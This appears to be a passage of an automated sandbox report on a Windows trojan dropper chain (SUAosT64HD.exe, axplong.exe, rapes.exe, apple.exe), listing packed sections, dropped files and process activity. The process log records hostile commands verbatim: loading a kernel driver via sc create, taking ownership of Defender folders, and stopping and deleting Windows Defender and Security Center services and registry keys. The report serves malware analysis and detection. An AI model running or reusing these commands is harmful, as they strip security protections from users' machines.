Source: SUAosT64HD.exe	Static PE information: section name:
Source: SUAosT64HD.exe	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: .idata
Source: rapes.exe.4.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_0069CAC7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

2_2_0069CAC7

Creates driver files

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\ssisd.sys

Jump to behavior

Creates files inside the system directory

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File created: C:\Windows\Tasks\axplong.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File created: C:\Windows\Tasks\rapes.job			Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\cmd.exe

File deleted: C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender

Detected potential crypto function

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A5B93	1_2_004A5B93
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A4AF0	1_2_004A4AF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A4CF0	1_2_004A4CF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004E8720	1_2_004E8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0068E440	2_2_0068E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A60C2	2_2_006A60C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C8720	2_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_00684AF0	2_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C2BD0	2_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_00684CF0	2_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A0D43	2_2_006A0D43
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C6F09	2_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C3068	2_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A1532	2_2_006A1532
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C765B	2_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C777B	2_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A3D21	2_2_006A3D21
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006B7D83	2_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C3068	3_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_00684AF0	3_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C2BD0	3_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_00684CF0	3_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006B7D83	3_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C765B	3_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C777B	3_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C8720	3_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C6F09	3_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C3068	10_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_00684AF0	10_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C2BD0	10_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_00684CF0	10_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006B7D83	10_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C765B	10_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C777B	10_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C8720	10_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C6F09	10_2_006C6F09

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe 36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe 1DC8BF01C0DF1FF9C85546E5304169E7F4B79712A63FBCB13CD577808D80B3FB

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 00697F30 appears 387 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D593 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D872 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 00697870 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069DEB0 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D57E appears 78 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 006B8CD3 appears 47 times
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: String function: 004B7F30 appears 128 times

Uses 32bit PE files

Source: SUAosT64HD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f

Source: SUAosT64HD.exe	Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: axplong.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: random[1].exe.2.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: random[1].exe.2.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: 3d9778a1ff.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: 3d9778a1ff.exe.2.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: rapes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: rapes.exe.4.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: Or1ARiR[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR[1].exe.11.dr	Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: Or1ARiR.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR.exe.11.dr	Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: xZRvIQ5[1].exe.11.dr	Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858
Source: xZRvIQ5.exe.11.dr	Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858

Source: axplong.exe.1.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: SUAosT64HD.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@118/47@0/3

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\22.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SUAosT64HD.exe	ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe	Virustotal: Detection: 77%

Source: 3d9778a1ff.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3d9778a1ff.exe	String found in binary or memory: " /add
Source: 3d9778a1ff.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File read: C:\Users\user\Desktop\SUAosT64HD.exe

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Users\user\Desktop\SUAosT64HD.exe "C:\Users\user\Desktop\SUAosT64HD.exe"
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: bcp47langs.dll	Jump to behavior
